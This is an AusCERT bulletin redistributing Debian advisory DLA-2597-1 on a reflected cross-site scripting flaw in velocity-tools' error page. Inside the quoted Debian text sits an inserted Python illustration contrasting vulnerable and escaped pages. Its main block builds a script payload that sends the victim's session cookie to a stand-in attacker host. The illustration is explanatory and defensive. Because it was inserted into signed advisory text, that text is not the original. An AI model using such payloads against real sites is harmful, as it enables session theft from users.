-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0944
                      velocity-tools security update
                               18 March 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           velocity-tools
Publisher:         Debian
Operating System:  Debian GNU/Linux
                   UNIX variants (UNIX, Linux, OSX)
                   Windows
Impact/Access:     Cross-site Scripting -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-13959  

Original Bulletin: 
   https://www.debian.org/lts/security/2021/dla-2597

Comment: This advisory references vulnerabilities in products which run on 
         platforms other than Debian. It is recommended that administrators 
         running velocity-tools check for an updated version of the software
         for their operating system.

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- - -------------------------------------------------------------------------
Debian LTS Advisory DLA-2597-1                debian-lts@lists.debian.org
https://www.debian.org/lts/security/                           Chris Lamb
March 17, 2021                                https://wiki.debian.org/LTS
- - -------------------------------------------------------------------------

Package        : velocity-tools
Version        : 2.0-6+deb9u1
CVE ID         : CVE-2020-13959
Debian Bug     : #985221

It was discovered that there was a cross-site scripting (XSS)
vulnerability in velocity-tools, a collection of useful tools for the
"Velocity" template engine.

The default error page reflected the requested template path back into
the HTML response without escaping it. An attacker who lures a victim into
following a crafted link could use this to steal session cookies, perform
requests in the name of the victim, mount phishing attacks, and carry out
similar attacks.
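To make the defect concrete, here is an added illustration in Python; it is
not code from velocity-tools, from Apache Velocity or from Debian. It models
a "template not found" error page that echoes the requested path into HTML,
places the hardened form beside it, and includes a small reflection check of
the kind a tester would run against a deployed instance. The function names
(render_error_vulnerable, render_error_fixed, probe_reflects_unescaped), the
example.test host and the probe string are assumptions for this example; the
request URLs and the cookie-stealing payload are constructed inputs.

```python
"""Reflected XSS in a servlet-style error page: vulnerable vs. hardened.

Added example, not part of velocity-tools or the Debian advisory. The page
layout, hostnames and function names are assumptions for illustration.
"""
import html
from urllib.parse import unquote, urlsplit


def requested_template(url: str) -> str:
    """Return the decoded path of the request URL (the 'template name')."""
    return unquote(urlsplit(url).path)


def render_error_vulnerable(url: str) -> str:
    """Error page that interpolates untrusted input into HTML without encoding.

    Anything the client puts in the path is emitted verbatim, so '<script>'
    in the URL becomes a script element in the victim's browser.
    """
    name = requested_template(url)
    return (
        "<html><body>"
        f"<h2>Error processing template '{name}'</h2>"
        "</body></html>"
    )


def render_error_fixed(url: str) -> str:
    """Same page, but the untrusted value is HTML-entity encoded.

    html.escape(quote=True) turns & < > \" ' into entities, which is the
    correct encoding for text placed inside an HTML element body.
    """
    name = html.escape(requested_template(url), quote=True)
    return (
        "<html><body>"
        f"<h2>Error processing template '{name}'</h2>"
        "</body></html>"
    )


# Constructed probe: contains exactly the characters that must be encoded.
PROBE = 'xss<"probe">'


def probe_reflects_unescaped(body: str, probe: str = PROBE) -> bool:
    """True when the raw probe survives into the response body.

    A correctly encoded page contains only the entity form of the probe,
    never the literal '<', '"' or '>' characters.
    """
    return probe in body


def probe_url(host: str = "example.test", probe: str = PROBE) -> str:
    """Build the request URL that carries the probe as the template name."""
    from urllib.parse import quote
    return f"http://{host}/app/{quote(probe, safe='')}.vm"


if __name__ == "__main__":
    # Constructed payload of the kind the advisory warns about: exfiltrate
    # the session cookie to an attacker-controlled host.
    payload = "<script>location='https://attacker.example/?c='+document.cookie</script>"
    attack_url = probe_url(probe=payload)

    print("vulnerable page:")
    print(render_error_vulnerable(attack_url))   # script tag lands in the HTML
    print("\nhardened page:")
    print(render_error_fixed(attack_url))        # only &lt;script&gt;... text

    for label, render in (("vulnerable", render_error_vulnerable),
                          ("fixed", render_error_fixed)):
        reflected = probe_reflects_unescaped(render(probe_url()))
        print(f"{label}: probe reflected unescaped = {reflected}")
```

The probe deliberately avoids a real script payload: a request containing
only `<"probe">` is enough to tell an encoding page from a reflecting one,
and it is what you would send against a live host before escalating to a
proof-of-concept. Note that the fix is output encoding for the HTML element
context; rejecting "bad" characters from the path would not protect a value
later placed in an attribute or a script block.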

For Debian 9 "Stretch", this problem has been fixed in version
2.0-6+deb9u1.

We recommend that you upgrade your velocity-tools packages.

For the detailed security status of velocity-tools please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/velocity-tools

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS

- -----BEGIN PGP SIGNATURE-----
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----